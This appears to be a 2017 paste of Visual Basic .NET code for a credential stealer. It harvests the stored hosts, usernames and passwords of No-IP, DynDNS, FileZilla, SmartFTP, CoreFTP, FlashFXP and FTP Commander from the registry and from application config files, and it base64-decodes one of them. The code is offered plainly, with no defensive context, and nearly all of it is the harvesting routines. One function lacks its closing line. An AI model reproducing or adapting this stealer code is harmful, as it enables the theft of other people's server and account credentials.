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May 18th, 2017
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  1. Function NoIP() As String
  2. Dim sHost As String = Replace(RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\Hosts"), "#,", "")
  3. Dim sUser As String = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\Username")
  4. Dim sPwd As String = FromBase64(RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\Password"))
  6. sHost = Replace(sHost, ",", vbNewLine)
  7. sHost = Replace(sHost, "|", vbNewLine)
  9. If Not sPwd = "" Then
  10. NoIP = "Hosts:" & vbNewLine & sHost & vbNewLine & "User: " & sUser & vbNewLine & "Pwd: " & sPwd
  11. Else
  12. NoIP = "Nothing is saved!"
  13. End If
  14. End Function
  16. Function DynDNS() As String
  17. Dim sPath As String = Replace(Environ$("APPDATA"), Environ$("Username"), "All Users") & "\DynDNS\Updater\config.dyndns"
  18. Dim sFile As String = ReadFile(sPath)
  19. Dim sHost As String = Cut(sFile, "[Hosts]", "Count=")
  20. Dim sUser As String = Cut(sFile, "Username=", vbNewLine)
  21. Dim sPwd As String = Cut(sFile, "Password=", vbNewLine)
  23. If Not sPwd = "" Then
  24. DynDNS = "Hosts:" & sHost & vbNewLine & "User: " & sUser & vbNewLine & "Pwd: " & sPwd & " (Encrypt)"
  25. Else
  26. DynDNS = "Nothing is saved!"
  27. End If
  28. End Function
  30. Function FileZilla() As String
  31. Dim sPath As String = Environ$("APPDATA") & "\FileZilla\sitemanager.xml"
  32. Dim sFile As String = ReadFile(sPath)
  33. Dim sHost As String = Cut(sFile, "<Host>", "</Host>")
  34. Dim sPort As String = Cut(sFile, "<Port>", "</Port>")
  35. Dim sUser As String = Cut(sFile, "<User>", "</User>")
  36. Dim sPwd As String = Cut(sFile, "<Pass>", "</Pass>")
  37. Dim sEntry As String = Cut(sFile, "<Name>", "</Name>")
  39. If Not sUser = "" Then
  40. FileZilla = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd
  41. Else
  42. FileZilla = "Nothing is saved!"
  43. End If
  44. End Function
  46. Function SmartFTP() As String
  47. Dim sPath As String = Environ$("APPDATA") & "\SmartFTP\Client 2.0\Favorites\Quick Connect\" & Dir(Environ$("APPDATA") & "\SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml")
  48. Dim sFile As String = ReadFile(sPath)
  49. Dim sHost As String = Cut(sFile, "<Host>", "</Host>")
  50. Dim sPort As String = Cut(sFile, "<Port>", "</Port>")
  51. Dim sUser As String = Cut(sFile, "<User>", "</User>")
  52. Dim sPwd As String = Cut(sFile, "<Password>", "</Password>")
  53. Dim sEntry As String = Cut(sFile, "<Name>", "</Name>")
  55. If Not sUser = "" Then
  56. SmartFTP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd + " (Encrypt)"
  57. Else
  58. SmartFTP = "Nothing is saved!"
  59. End If
  60. End Function
  62. Function CoreFTP() As String
  63. Dim sPath As String = Environ$("APPDATA") & "\CoreFTP\sites.idx"
  64. Dim sFile As String = Left(ReadFile(sPath), 1)
  65. Dim sHost As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Host")
  66. Dim sPort As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Port")
  67. Dim sUser As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\User")
  68. Dim sPwd As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\PW")
  69. Dim sEntry As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Name")
  71. If Not sUser = "" Then
  72. CoreFTP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd + " (Encrypt)"
  73. Else
  74. CoreFTP = "Nothing is saved!"
  75. End If
  76. End Function
  78. Function FlashFXP() As String
  79. Dim sPath As String = Replace(Environ$("APPDATA"), Environ$("Username"), "All Users") & "\FlashFXP\" & "3" & "\quick.dat"
  80. Dim sFile As String = ReadFile(sPath)
  81. Dim sHost As String = Cut(sFile, "IP=", vbNewLine)
  82. Dim sPort As String = Cut(sFile, "port=", vbNewLine)
  83. Dim sUser As String = Cut(sFile, "user=", vbNewLine)
  84. Dim sPwd As String = Cut(sFile, "pass=", vbNewLine)
  85. Dim sEntry As String = Cut(sFile, "created=", vbNewLine)
  87. If Not sUser = "" Then
  88. FlashFXP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd + " (Encrypt)"
  89. Else
  90. FlashFXP = "Nothing is saved!"
  91. End If
  92. End Function
  94. Function FtpCommander() As String
  95. Dim sPath As String = Replace(RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander\UninstallString"), "uninstall.exe", vbNullString) & "Ftplist.txt"
  96. Dim sFile As String = ReadLine(sPath, -1)
  97. Dim sHost As String = Cut(sFile, ";Server=", ";Port=")
  98. Dim sPort As String = Cut(sFile, ";Port=", ";Password=")
  99. Dim sUser As String = Cut(sFile, ";User=", ";Anonymous=")
  100. Dim sPwd As String = Cut(sFile, ";Password=", ";User=")
  101. Dim sEntry As String = Cut(sFile, "Name=", ";Server=")
  103. If Not sUser = "" Then
  104. FtpCommander = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd
  105. Else
  106. FtpCommander = "Nothing is saved!"
  107. End If
  109. Function ReadFile(ByVal sFile As String) As String
  110. On Error Resume Next
  111. Dim OpenFile As New System.IO.StreamReader(sFile)
  112. ReadFile = OpenFile.ReadToEnd.ToString
  113. End Function
  115. Function Cut(ByVal sInhalt As String, ByVal sText As String, ByVal sText2 As String) As String
  116. On Error Resume Next
  117. Dim c() As String
  118. Dim c2() As String
  119. c = Split(sInhalt, sText)
  120. c2 = Split(c(1), sText2)
  121. Cut = c2(0)
  122. End Function
  124. Function RegRead(ByVal hKey As String) As String
  125. Dim wshShell As Object = CreateObject("WScript.Shell")
  126. On Error Resume Next
  127. RegRead = wshShell.RegRead(hKey)
  128. End Function
  130. Public Function ReadLine(ByVal filename As String, _
  131. ByVal line As Integer) As String
  132. Try
  133. Dim lines As String() = My.Computer.FileSystem.ReadAllText( _
  134. filename, System.Text.Encoding.Default).Split(vbCrLf)
  135. If line > 0 Then
  136. Return lines(line - 1)
  137. ElseIf line < 0 Then
  138. Return lines(lines.Length + line - 1)
  139. Else
  140. Return ""
  141. End If
  142. Catch ex As Exception
  143. Return ""
  144. End Try
  145. End Function
  147. Public Function FromBase64(ByVal sText As String) As String
  148. Dim nBytes() As Byte = System.Convert.FromBase64String(sText)
  149. FromBase64 = System.Text.Encoding.Default.GetString(nBytes)
  150. End Function
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